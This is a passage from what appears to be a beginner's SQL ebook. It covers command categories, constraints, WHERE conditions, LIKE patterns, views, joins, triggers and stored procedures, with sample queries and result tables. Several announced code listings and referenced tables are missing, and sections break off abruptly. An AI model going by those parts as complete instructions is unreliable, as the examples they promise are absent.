you look at this, you are basically just looking at groups of information.
Some people will consider these to be organizational mechanisms that will be
used to store information that you, as the user, can look at later on, and it can
do this as effectively as possible. There are a ton of things that SQL can help
you with when it comes to managing your database, and you will see some
great results.
There are times when you are working on a project with your company, and
you may be working with some kind of database that is very similar to SQL,
and you may not even realize that you are doing this. For example, one
database that you commonly use is the phone book. This will contain a ton of
information about people in your area including their name, what business
they are in, their address, and their phone numbers. And all this information
is found in one place so you won't have to search all over to find it.
This is kind of how the SQL database works as well. It will do this by
looking through the information that you have available through your
company database. It will sort through that information so that you are better
able to find what you need the most without making a mess or wasting time.
Relational databases
First, we need to take a look at the relational databases. This database is the
one that you will want to use when you want to work with databases that are
aggregated into logical units or other types of tables, and then these tables
have the ability to be interconnected inside of your database in a way that will
make sense depending on what you are looking for at the time. These
databases can also be good to use if you want to take in some complex
information, and then get the program to break it down into some smaller
pieces so that you can manage it a little bit better.
The relational databases are good ones to work with because they allow you
to grab on to all the information that you have stored for your business, and
then manipulate it in a way that makes it easier to use. You can take that
complex information and then break it up into a way that you and others are
more likely to understand. While you might be confused by all the
information and how to break it all up, the system would be able to go
through this and sort it the way that you need in no time. You are also able to
get some more security so that if you place personal information about the
customer into that database, you can keep it away from others, in other
words, it will be kept completely safe from people who would want to steal
it.
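The idea of interconnected tables can be sketched with two tiny tables joined on a shared column. The `customers` and `orders` names below are invented for illustration, and SQLite stands in for whichever relational database you actually use:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()

# Two logical units, held separately because their information differs
cur.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT)")
cur.execute("CREATE TABLE orders (customer_id INTEGER, item TEXT)")

cur.execute("INSERT INTO customers VALUES (1, 'Ana')")
cur.execute("INSERT INTO orders VALUES (1, 'lamp')")

# The tables are interconnected through the shared customer id
rows = cur.execute("""
    SELECT customers.name, orders.item
    FROM customers JOIN orders ON customers.id = orders.customer_id
""").fetchall()
print(rows)  # [('Ana', 'lamp')]
```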
Client and server technology
In the past, if you were working with a computer for your business, you were
most likely using a mainframe computer. What this means is that the
machines were able to hold onto a large system, and this system would be
good at storing all the information that you need and for processing options.
Now, these systems were able to work, and they got the job done for a very
long time. If your company uses these and this is what you are most
comfortable with using, it does get the work done. But there are some options
on the market that will do a better job. These options can be found in the
client-server system.
These systems will use some different processes to help you to get the results
that are needed. With this one, the main computer that you are using, which
would be called the ‘server,’ will be accessible to any user who is on the
network. Now, these users must have the right credentials to do this, which
helps to keep the system safe and secure. But if the user has the right
information and is on your network, they can reach the information without a
lot of trouble and barely any effort. The user can get the server from other
servers or from their desktop computer, and the user will then be known as
the ‘client’ so that the client and server are easily able to interact through this
database.
Now, before we get too far into some of the coding that we can
do with this kind of language, one of the first things that we need to
learn a bit more about is some of the basic commands that come with this
language, and how each of them works. You will find that when
you know some of the commands that come with any language, but
especially with the SQL language, it will ensure that everything within the
database works the way that you would like.
As we go through this, you will find that the commands in SQL, just like the
commands in any other language, are going to vary. Some are going to be
easier to work with and some are going to be more of a challenge. But all of
them are going to come into use when you would like to create some of your
own queries and more in this language as well so it is worth our time to learn
how this works.
When it comes to learning some of the basic commands that are available in
SQL, you will be able to divide them into six categories and these are all
going to be based on what you will be able to use them for within the system.
Below are the six different categories of commands that you can use inside of
SQL and they include the following.
Data Definition Language
The data definition language, or DDL, is an aspect inside of SQL that will
allow you to generate objects in the database before arranging them the way
that you would like. For example, you will be able to use this aspect of the
system in order to add or delete objects in the database table. Some of the
commands that you will be able to use with the DDL category include:
Create table
Alter table
Drop table
Create index
Alter index
Drop index
Drop view
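A minimal sketch of these DDL commands, run against SQLite from Python (SQLite does not support ALTER INDEX, so only the portable subset is shown, and the `books` table is a made-up example):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()

# Create table
cur.execute("CREATE TABLE books (id INTEGER PRIMARY KEY, title TEXT)")
# Create index
cur.execute("CREATE INDEX idx_title ON books(title)")
# Alter table: add a column to the existing structure
cur.execute("ALTER TABLE books ADD COLUMN author TEXT")
# Drop index, then drop the table itself
cur.execute("DROP INDEX idx_title")
cur.execute("DROP TABLE books")
```

After the last statement the table no longer exists in the database catalog.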
Data Manipulation Language
A DML, or data manipulation language, is the aspect of
SQL that you will use to modify the information about
objects inside your database. This makes it so much easier
to delete objects, update them, or insert
something new into the database that you are
working with. You will find that this is one of the best ways to
add some freedom to the work that you are doing, ensuring that
you can change the information that is already there rather than
only adding something new.
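The three DML operations (insert, update, delete) can be sketched like this, using a hypothetical `users` table in an in-memory SQLite database:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")

# INSERT: add new rows
cur.execute("INSERT INTO users (name) VALUES ('Alice')")
cur.execute("INSERT INTO users (name) VALUES ('Bob')")

# UPDATE: change information that is already there
cur.execute("UPDATE users SET name = 'Alicia' WHERE name = 'Alice'")

# DELETE: remove rows you no longer want
cur.execute("DELETE FROM users WHERE name = 'Bob'")

rows = cur.execute("SELECT name FROM users").fetchall()
print(rows)  # [('Alicia',)]
```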
Data Query Language
Along the same lines is the DQL, or data
query language. This one is going to be fun to work with, because it is
one of the most powerful aspects of the SQL language,
and even more so when you work with a modern database.
With DQL there is really only one
command to choose from, and that is the
SELECT command. You use this command to make sure that all
of your queries are run in the right way within your relational database. And if
you want results that are more detailed, you can
add in some options or a special clause along with
the SELECT command to narrow things down.
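Here is a short sketch of SELECT with extra clauses, against a made-up `products` table in SQLite. The WHERE clause filters the rows and ORDER BY sorts the result:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE products (name TEXT, price REAL)")
cur.executemany("INSERT INTO products VALUES (?, ?)",
                [("mouse", 10.0), ("keyboard", 25.0), ("monitor", 120.0)])

# SELECT with WHERE and ORDER BY clauses for a more detailed result
cheap = cur.execute(
    "SELECT name FROM products WHERE price < 50 ORDER BY price"
).fetchall()
print(cheap)  # [('mouse',), ('keyboard',)]
```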
Data Control Language
The DCL or the data control language is going to be a command that you are
able to use when you would like to ensure you are maintaining some of the
control that you need over the database, and when you would like to limit
who is allowed to access that particular database, or parts of the database, at a
given time. You will also find that the DCL idea is going to be used in a few
situations to help generate the objects of the database related to who is going
to have the necessary access to see the information that is found on that
database.
This could include those who will have the right to distribute the necessary
privileges of access when it comes to this data. This can be a good option to
use when your business is dealing with a lot of sensitive information and
you only want a few people to get ahold of it at any given time. Some of the
different commands that you may find useful to use when working with the
DCL commands are going to include:
Revoke
Create synonym
Alter password
Grant
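To give a feel for these commands (the user and table names are hypothetical, and the exact syntax varies between database systems):
GRANT SELECT ON EMPLOYEES TO clerk_user;
REVOKE SELECT ON EMPLOYEES FROM clerk_user;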
Data Administration Commands
When you choose to work with these commands, you will be able to analyze
and also audit the operations in the database. In some instances, you
will be able to assess the overall performance with the help of these
commands. This is what makes these good commands to choose when you
want to fix some of the bugs that are on the system and you want to get rid of
them so that the database will continue to work properly. Some of the most
common commands that are used for this type include:
Start audit
Stop audit
One thing to keep in mind is that database administration and data
administration are basically different things when you are in SQL. Database
administration is in charge of managing all of the databases, including the
commands that you set out in SQL, and it is also a bit more specific to
implementing SQL as well.
FOREIGN Key
A foreign key constraint is used to associate a table with another table. Also
known as referencing key, the foreign key is commonly used when you’re
working on parent and child tables. In this type of table relationship, a key in
the child table points to a primary key in the parent table.
A foreign key may consist of one or several columns containing values that
match the primary key in another table. It is commonly used to ensure
referential integrity within the database.
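As a sketch of such a parent and child pair (the CUSTOMERS and ORDERS tables here are invented for illustration), the child table's foreign key points back at the parent's primary key:
CREATE TABLE CUSTOMERS (
    ID INT NOT NULL,
    NAME VARCHAR(20),
    PRIMARY KEY (ID)
);
CREATE TABLE ORDERS (
    ORDER_ID INT NOT NULL,
    CUSTOMER_ID INT,
    PRIMARY KEY (ORDER_ID),
    FOREIGN KEY (CUSTOMER_ID) REFERENCES CUSTOMERS(ID)
);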
NOT NULL
A column accepts NULL values by default. To prevent NULL values
from populating a table's column, you can implement a NOT NULL
constraint on the column. Bear in mind that the word NULL pertains to
unknown data, not zero data.
To illustrate, the following code creates the table STUDENTS and defines six
columns:
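A table like that might be defined as follows (the column names and types here are just an illustration, not the book's original listing):
CREATE TABLE STUDENTS (
    ID INT NOT NULL,
    NAME VARCHAR(20) NOT NULL,
    AGE INT NOT NULL,
    ADDRESS CHAR(25),
    CITY VARCHAR(20),
    GRADE DECIMAL(5, 2),
    PRIMARY KEY (ID)
);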
You can also use the ALTER TABLE statement to add a UNIQUE constraint
to an existing table. Here’s the code:
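For example, to require unique values in a hypothetical ID column of the STUDENTS table, one common form is:
ALTER TABLE STUDENTS
ADD UNIQUE (ID);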
You may also add constraint to more than one column by using ALTER
TABLE with ADD CONSTRAINT:
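For instance, a named constraint covering two hypothetical columns of the STUDENTS table could look like:
ALTER TABLE STUDENTS
ADD CONSTRAINT uq_name_age UNIQUE (NAME, AGE);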
DEFAULT Constraint
The DEFAULT constraint is used to provide a default value whenever the
user fails to enter a value for a column during an INSERT INTO operation.
To demonstrate, the following code will create a table named EMPLOYEES
with five columns. Notice that the SALARY column takes a default value
(4000.00) which will be used if no value was provided when you add new
records:
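A sketch of such a table (the columns other than SALARY are assumptions for illustration):
CREATE TABLE EMPLOYEES (
    ID INT NOT NULL,
    NAME VARCHAR(20) NOT NULL,
    AGE INT,
    ADDRESS CHAR(25),
    SALARY DECIMAL(18, 2) DEFAULT 4000.00,
    PRIMARY KEY (ID)
);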
You may also use the ALTER TABLE statement to add a DEFAULT constraint
to an existing table:
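One common form looks like this (MySQL syntax; other database systems phrase it differently):
ALTER TABLE EMPLOYEES
ALTER COLUMN SALARY SET DEFAULT 5000.00;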
CHECK Constraint
A CHECK constraint is used to ensure that each value entered in a column
satisfies a given condition. An attempt to enter non-matching data will
result in a violation of the CHECK constraint, which will cause the data to be
rejected.
For example, the code below will create a table named GAMERS with five
columns. It will place a CHECK constraint on the AGE column to ensure that
there will be no gamers under 13 years old on the table.
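A sketch of such a table (the columns other than AGE are assumptions for illustration):
CREATE TABLE GAMERS (
    ID INT NOT NULL,
    NAME VARCHAR(20) NOT NULL,
    AGE INT NOT NULL CHECK (AGE >= 13),
    ADDRESS CHAR(25),
    USERNAME VARCHAR(20),
    PRIMARY KEY (ID)
);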
You can also use the ALTER TABLE statement with MODIFY to add the
CHECK constraint to an existing table:
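One possible form (MODIFY is MySQL/Oracle-style syntax; other systems use different keywords):
ALTER TABLE GAMERS
MODIFY AGE INT NOT NULL CHECK (AGE >= 13);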
INDEX Constraint
The INDEX constraint lets you build and access information quickly from a
database. You can easily create an index with one or more table columns.
After the INDEX is created, SQL assigns a ROWID to each row prior to
sorting. Proper indexing can enhance the performance and efficiency of large
databases.
Here’s the syntax:
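The general form is roughly:
CREATE INDEX index_name
ON table_name (column1, column2, ...);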
For instance, if you need to search for a group of employees from a specific
location in the EMPLOYEES table, you can create an INDEX on the column
LOCATION.
Here’s the code:
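A sketch of that statement (the index name is arbitrary):
CREATE INDEX idx_location
ON EMPLOYEES (LOCATION);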
Example:
Truncate Table Employee;
Output:
Command(s) completed successfully.
Now, if you select the records of Employee table, you will find out that it’s
empty and the records that you inserted earlier are not there anymore. If you
want to drop the table and its data, use the Drop command.
Example:
Drop Table Employee;
Output:
Command(s) completed successfully.
After the successful execution of drop command, the Employee table will be
deleted.
There exist three relationship types between tables. A one-to-one
relationship between two tables means that a single record from table A will
only be associated to a single row in table B. A one-to-many relationship
suggests that a single record from table A will be related to more than one
record present in table B. For example, a single employee, Aaron, could serve
more than one customer, hence a one-to-many relationship exists between
employees and customers. In a many-to-many relationship, multiple rows
from table A can be associated with multiple rows of table B. For example, a
course can have many registered students and many students could have
registered more than one course. The list of examples goes on and on. It will
be a good exercise for you to come up with at least five examples for each
relationship type.
Chapter 9 Defining Your Condition
There is no doubt that a data server can handle many complications, provided
everything is defined clearly. Conditions are defined with the help of
expressions, which may consist of numbers, strings, built-in functions,
subqueries, and so on. Furthermore, conditions are always defined with the
help of operators, which may be comparison operators (=, !=, <, >, <>, LIKE,
IN, BETWEEN, etc.) or arithmetic operators (+, -, *, /). All these things are
used together to form a condition. Now let's move on to condition types.
Types of Conditions
In order to remove unwanted data from our search, we can use these
conditions. Let’s have a look at some of these condition types.
Equality Condition
Conditions that use the equal sign ‘=’ to equate one condition to another are
referred to as equality conditions. You have used this condition many times at
this point.
If we want to know the name of the HOD for Genetic Engineering
department, we would do the following:
(1) First go to ENGINEERING_STUDENTS table and find the ENGG_ID
for ENGG_NAME ‘Genetic’,
SELECT ENGG_ID FROM ENGINEERING_STUDENTS WHERE
ENGG_NAME ='Genetic';
+---------+
| ENGG_ID |
+---------+
|       3 |
+---------+
(2) Then go to Dept_Data table and find the value in HOD column for
ENGG_ID = 3.
SELECT HOD FROM DEPT_DATA where ENGG_ID='3';
+--------------+
| HOD          |
+--------------+
| Victoria Fox |
+--------------+
In the first step, we equated the value of column ENGG_NAME to the string
value of ‘Genetic’.
SELECT e.ENGG_NAME, e.STUDENT_STRENGTH, d.HOD, d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d
ON e.ENGG_ID = d.ENGG_ID
WHERE e.ENGG_NAME = 'Genetic';
+-----------+------------------+--------------+------------+
| ENGG_NAME | STUDENT_STRENGTH | HOD          | NO_OF_Prof |
+-----------+------------------+--------------+------------+
| Genetic   |               75 | Victoria Fox |          7 |
+-----------+------------------+--------------+------------+
In the above query, we have all the information in one result set by using an
INNER JOIN and applying the equality condition twice.
Inequality Condition
The inequality condition is the opposite of the equality condition and is
expressed by the ‘!=’ or ‘<>’ symbol.
SELECT e.ENGG_NAME, e.STUDENT_STRENGTH, d.HOD, d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d
ON e.ENGG_ID = d.ENGG_ID
WHERE e.ENGG_NAME <> 'Genetic';
+-------------------+------------------+------------------+------------+
| ENGG_NAME         | STUDENT_STRENGTH | HOD              | NO_OF_Prof |
+-------------------+------------------+------------------+------------+
| Electronics       |              150 | Miley Andrews    |          7 |
| Software          |              250 | Alex Dawson      |          6 |
| Mechanical        |              150 | Anne Joseph      |          5 |
| Biomedical        |               72 | Sophia Williams  |          8 |
| Instrumentation   |               80 | Olive Brown      |          4 |
| Chemical          |               75 | Joshua Taylor    |          6 |
| Civil             |               60 | Ethan Thomas     |          5 |
| Electronics & Com |              250 | Michael Anderson |          8 |
| Electrical        |               60 | Martin Jones     |          5 |
+-------------------+------------------+------------------+------------+
The statement is the same as saying:
SELECT e.ENGG_NAME, e.STUDENT_STRENGTH, d.HOD, d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d
ON e.ENGG_ID = d.ENGG_ID
WHERE e.ENGG_NAME != 'Genetic';
If you execute the above statement on the command window, you will
receive the same result set.
Using the equality condition to modify data
Suppose the institute decides to close the Genetic Department; in that case, it
is important to delete the records from the database as well.
First, find out the ENGG_ID for ‘Genetic’:
SELECT * FROM ENGINEERING_STUDENTS WHERE
ENGG_NAME='Genetic';
+ - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
| 3 | Genetic | 75 |
+ - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
Now from DEPT_DATA we will DELETE the row having ENGG_ID =’3’
DELETE FROM DEPT_DATA WHERE ENGG_ID ='3';
Next, we need to check if the data has been actually deleted or not:
SELECT * FROM DEPT_DATA;
+---------+------------------+------------+---------+
| Dept_ID | HOD              | NO_OF_Prof | ENGG_ID |
+---------+------------------+------------+---------+
|     100 | Miley Andrews    |          7 |       1 |
|     101 | Alex Dawson      |          6 |       2 |
|     103 | Anne Joseph      |          5 |       4 |
|     104 | Sophia Williams  |          8 |       5 |
|     105 | Olive Brown      |          4 |       6 |
|     106 | Joshua Taylor    |          6 |       7 |
|     107 | Ethan Thomas     |          5 |       8 |
|     108 | Michael Anderson |          8 |       9 |
|     109 | Martin Jones     |          5 |      10 |
+---------+------------------+------------+---------+
Then delete the row from ENGINEERING_STUDENTS where the
ENGG_ID is 3.
DELETE FROM ENGINEERING_STUDENTS WHERE ENGG_ID='3';
Lastly, check if the row has been deleted from
ENGINEERING_STUDENTS:
SELECT * FROM ENGINEERING_STUDENTS;
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 1 | Electronics | 150 |
| 2 | Software | 250 |
| 4 | Mechanical | 150 |
| 5 | Biomedical | 72 |
| 6 | Instrumentation | 80 |
| 7 | Chemical | 75 |
| 8 | Civil | 60 |
| 9 | Electronics & Com | 250 |
| 10 | Electrical | 60 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
Note the records have been successfully deleted from both tables.
In the same way, the equality condition can be used to update data as well.
Conditions used to define range
We have seen examples of ranges previously, but we will delve a little deeper
to solidify that knowledge. We want to write queries that define a range to
ensure our expression falls within the desired bounds.
SELECT * FROM ENGINEERING_STUDENTS WHERE
STUDENT_STRENGTH > 175;
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 2 | Software | 250 |
| 9 | Electronics & Com | 250 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
Have a look at another simple example:
SELECT * FROM ENGINEERING_STUDENTS WHERE
300>STUDENT_STRENGTH AND STUDENT_STRENGTH>78;
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 1 | Electronics | 150 |
| 2 | Software | 250 |
| 4 | Mechanical | 150 |
| 6 | Instrumentation | 80 |
| 9 | Electronics & Com | 250 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
Next, we will define the same query using the BETWEEN operator. While
defining a range using the BETWEEN operator, specify the lesser value first
and the higher value later.
SELECT * FROM ENGINEERING_STUDENTS WHERE
STUDENT_STRENGTH BETWEEN 78 AND 300;
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 1 | Electronics | 150 |
| 2 | Software | 250 |
| 4 | Mechanical | 150 |
| 6 | Instrumentation | 80 |
| 9 | Electronics & Com | 250 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
Membership Conditions
Sometimes the requirement is not to look for values in a range, but in a set of
certain values. To give you a better idea, suppose that you need to find the
details for ‘Electronics’, ‘Instrumentation’ and ‘Mechanical’:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
= 'Electronics' OR ENGG_NAME = 'Mechanical' OR ENGG_NAME =
'Instrumentation';
+---------+-----------------+------------------+
| ENGG_ID | ENGG_NAME       | STUDENT_STRENGTH |
+---------+-----------------+------------------+
|       1 | Electronics     |              150 |
|       4 | Mechanical      |              150 |
|       6 | Instrumentation |               80 |
+---------+-----------------+------------------+
We can simplify the above query and get the right result sets using the IN
operator:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
IN ('Electronics', 'Instrumentation', 'Mechanical');
+---------+-----------------+------------------+
| ENGG_ID | ENGG_NAME       | STUDENT_STRENGTH |
+---------+-----------------+------------------+
|       1 | Electronics     |              150 |
|       4 | Mechanical      |              150 |
|       6 | Instrumentation |               80 |
+---------+-----------------+------------------+
In the same way, if you want to find the data for engineering fields other
than ‘Electronics’, ‘Mechanical’ and ‘Instrumentation’, use the NOT IN
operator as shown below:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
NOT IN ('Electronics', 'Instrumentation', 'Mechanical');
+---------+-------------------+------------------+
| ENGG_ID | ENGG_NAME         | STUDENT_STRENGTH |
+---------+-------------------+------------------+
|       2 | Software          |              250 |
|       5 | Biomedical        |               72 |
|       7 | Chemical          |               75 |
|       8 | Civil             |               60 |
|       9 | Electronics & Com |              250 |
|      10 | Electrical        |               60 |
+---------+-------------------+------------------+
Matching Conditions
Suppose you meet all the HODs of the college in a meeting and you are very
impressed by one of them, but you only remember that the name starts with
‘S’. You can use the following query to find the right person:
SELECT * FROM DEPT_DATA WHERE LEFT(HOD,1)='S';
Here we are using the function LEFT(). It has two parameters: the first is the
string from which characters are extracted; here, we look in the column
HOD. The second value determines how many characters should be
extracted from the left.
In this case, we remember the name starts with ‘S’, so we are just going to
extract the first letter of each name in the HOD column and check if it
matches ‘S’. The result is as shown below:
+---------+-----------------+------------+---------+
| Dept_ID | HOD             | NO_OF_Prof | ENGG_ID |
+---------+-----------------+------------+---------+
|     104 | Sophia Williams |          8 |       5 |
+---------+-----------------+------------+---------+
One more demonstration to help reinforce the concept:
Suppose you want to look for people having the names starting with ‘Mi’:
SELECT * FROM DEPT_DATA WHERE LEFT(HOD,2)='Mi';
+---------+------------------+------------+---------+
| Dept_ID | HOD              | NO_OF_Prof | ENGG_ID |
+---------+------------------+------------+---------+
|     100 | Miley Andrews    |          7 |       1 |
|     108 | Michael Anderson |          8 |       9 |
+---------+------------------+------------+---------+
Pattern Matching
Pattern matching is another interesting feature you will enjoy, and will use
often as a developer. The concept is simple: it allows you to use an
underscore ( _ ) to match any single character and a percentage sign (%) to
match zero, one, or more characters. Before moving ahead, know that two
comparison operators, LIKE and NOT LIKE, are used in pattern matching.
Now onto the exercises:
Here is the same example where we want to find out the HOD with a name
starting with ‘S’.
SELECT * FROM DEPT_DATA WHERE HOD LIKE 'S%';
+---------+-----------------+------------+---------+
| Dept_ID | HOD             | NO_OF_Prof | ENGG_ID |
+---------+-----------------+------------+---------+
|     104 | Sophia Williams |          8 |       5 |
+---------+-----------------+------------+---------+
Now, let’s look for HOD having name ending with ‘ws’:
SELECT * FROM DEPT_DATA WHERE HOD LIKE '%ws';
+ - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+
| 100 | Miley Andrews | 7 | 1|
+ - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+
Let’s see if we can find a name containing the string ‘cha’.
SELECT * FROM DEPT_DATA WHERE HOD LIKE '%cha%';
+ - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+
| 108 | Michael Anderson | 8 | 9|
+ - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+
The next example shows how to look for a five letter word with ‘i’ being the
second letter of the word:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
LIKE '_i___';
+ - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+
| 8 | Civil | 60 |
+ - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+
Regular Expressions
To add more flexibility to your search operations, you can make use of
Regular expressions. It is a vast topic, so here are a few tips to make you
comfortable when utilizing regular expressions:
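As one small illustration (using MySQL's REGEXP operator; other systems use different operators such as SIMILAR TO or ~), the earlier "name starts with ‘S’" search could be written with a regular expression anchor:
SELECT * FROM DEPT_DATA WHERE HOD REGEXP '^S';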
Based on the table above, you may want to create a view of the customers’
name and the City only. This is how you should write your statement.
Example: CREATE VIEW EmployeesSalary_VIEW AS
SELECT Names, City
FROM EmployeesSalary;
From the resulting VIEW table, you can now create a query such as the
statement below.
SELECT * FROM EmployeesSalary_VIEW;
This SQL query will display a table that will appear this way:
EmployeesSalary
Names City
Williams, Michael Casper
Colton, Jean San Diego
Anderson, Ted Laramie
Dixon, Allan Chicago
Clarkson, Tim New York
Alaina, Ann Ottawa
Rogers, David San Francisco
Lambert, Jancy Los Angeles
Kennedy, Tom Denver
Schultz, Diana New York
INSERTING ROWS
Inserting rows through a view follows the ordinary INSERT INTO syntax
used for tables. Make sure you have included all of the NOT NULL columns.
Example: INSERT INTO "view_name" ("column_name1")
VALUES (value1);
VIEWS can be utterly useful, if you utilize them appropriately.
So far in this eBook, tables have been used to represent data and
information. Views are like virtual tables, but they don’t hold any data;
their contents are defined by a query. One of the biggest advantages of a
view is that it can be used as a security measure by restricting access to
certain columns or rows. Also, you can use views to return a selective
amount of data instead of detailed data. A view protects the data layer while
allowing access to the necessary data. A view differs from a stored
procedure in that it doesn’t use parameters to carry out a function.
Encrypting the View
You can create a view without columns which contain sensitive data and thus
hide data you don’t want to share. You can also encrypt the view definition
which returns data of a privileged nature. Not only are you restricting certain
columns in a view you are also restricting who has access to the view.
However, once you encrypt a view it is difficult to get back to the original
view definition, so the best approach is to make a backup of the original view.
Creating a view
To create a view in SSMS expand the database you are working on, right
click on Views and select New View. The View Designer will appear
showing all the tables that you can add. Add the tables you want in the
View. Now select which columns you want in the View. You can now
change the sort type for each column from ascending to descending and can
also give column names aliases. On the right side of sort type there is Filter.
Filter restricts what a user can and cannot see. Once you set a filter (e.g.
sales > 1000) a user cannot retrieve more information than this view allows.
In the T-SQL code there is a line stating TOP (100) PERCENT, which is the
default. You can remove it (along with the ORDER BY clause) or change
the value. Once you have made the changes, save the view with the save
button, prefixing the view’s name with vw_. You can inspect the contents of
the view if you refresh the database, expand Views, right click on the view
and select the top 1000 rows.
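The same kind of view can also be created directly in T-SQL instead of through the designer; a minimal sketch using the sales > 1000 filter mentioned above (the table and column names are placeholders):
CREATE VIEW vw_SalesOver1000
AS
SELECT CustomerName, Sales
FROM SalesTable
WHERE Sales > 1000;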
Indexing a view
You can index a view just like you can index a table. The rules are very
similar. When you build a view the first index needs to be a unique clustered
index. Subsequent non clustered indexes can then be created. You need to
have the following set to on, and one off:
SET ANSI_NULLS ON
SET ANSI_PADDING ON
SET ANSI_WARNINGS ON
SET CONCAT_NULL_YIELDS_NULL ON
SET ARITHABORT ON
SET QUOTED_IDENTIFIER ON
SET NUMERIC_ROUNDABORT OFF
Now type the following:
CREATE UNIQUE CLUSTERED INDEX _ixCustProduct
ON table.vw_CusProd(col1, col2)
Chapter 11 Triggers
Sometimes a modification to the data in your database will need an automatic
action on data somewhere else, be it in your database, another database or
within SQL Server. A trigger is an object that will do it. A trigger in SQL
Server is essentially a Stored Procedure which will run performing the action
you want to achieve. Triggers are mostly used to ensure the business logic is
being adhered to in the database, performing cascading data modifications
(i.e. change on one table will result in changes in other tables) and keeping
track of specific changes to a table. SQL Server supports three types of
triggers: DML triggers, DDL triggers, and logon triggers.
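As a brief taste of what a DML trigger looks like, here is a sketch in T-SQL (the Orders and OrdersAudit tables are invented for illustration; the trigger copies each newly inserted order into an audit table):
CREATE TRIGGER trg_AuditOrders
ON Orders
AFTER INSERT
AS
BEGIN
    INSERT INTO OrdersAudit (OrderID, ChangedAt)
    SELECT OrderID, GETDATE() FROM inserted;
END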
Table B
StudentInformation
StudentNo Year Average
1 1st 90
2 1st 87
3 3rd 88
4 5th 77
5 2nd 93
You may want to extract specified data from both tables. Let’s say from table
A, you want to display LastName, FirstName and the City, while from Table
B, you want to display the Average.
You can construct your SQL statement this way:
Example:
SELECT Students.LastName, Students.FirstName,
StudentInformation.Average
FROM Students
INNER JOIN StudentInformation ON Students.StudentNo=
StudentInformation.StudentNo;
This SQL query will display these data on your resulting table:
LastName FirstName Average
Potter Michael 90
Walker Jean 87
Anderson Ted 88
Dixon Allan 77
Cruise Timothy 93
Making use of this JOIN SQL syntax properly can save time and money. Use
them to your advantage.
Take note that when the WHERE clause is used, the CROSS JOIN becomes
an INNER JOIN.
There is also another way of expressing your CROSS JOIN. The SQL can be
written this way:
Example: SELECT LastName, FirstName, Age, Address, City
FROM Students
CROSS JOIN StudentInformation;
There will be slight variations in the SQL statements of other SQL servers,
but the main syntax is typically basic.
Chapter 13 Stored Procedures and Functions
So far, we have covered how to build queries as single executable lines.
However, you can place a number of lines into what is known as a stored
procedure or function within SQL Server and call them whenever it is
required.
There are a number of benefits to stored procedures and functions beyond
just code reuse, including: better security, reduced development cost,
consistent and safe data, modularization, and shared application logic.
Stored procedures and functions are similar in that they both store and run
code, but functions are executed within the context of another unit of work.
T-SQL
There are a number of different ways in which you can execute the query.
You can specify RECOMPILE to indicate that the database engine shouldn’t
cache this stored procedure, so it must be recompiled every time it’s
executed. You can use the ENCRYPTION keyword to hide the stored
procedure so it’s not readily readable. The EXECUTE AS clause identifies
the specific security context under which the procedure will execute, i.e. it
controls which user account is used to validate the stored procedure.
After you declare the optional parameters, you use the mandatory keyword
AS, which defines the start of the T-SQL code, and finish with END. You
can use a stored procedure for more than just regular SQL statements like
SELECT; you can also return a value, which is useful for error checking.
IF ELSE
Often you will use statements in a stored procedure where you need a logical
true or false answer before you can proceed to the next statement. The IF
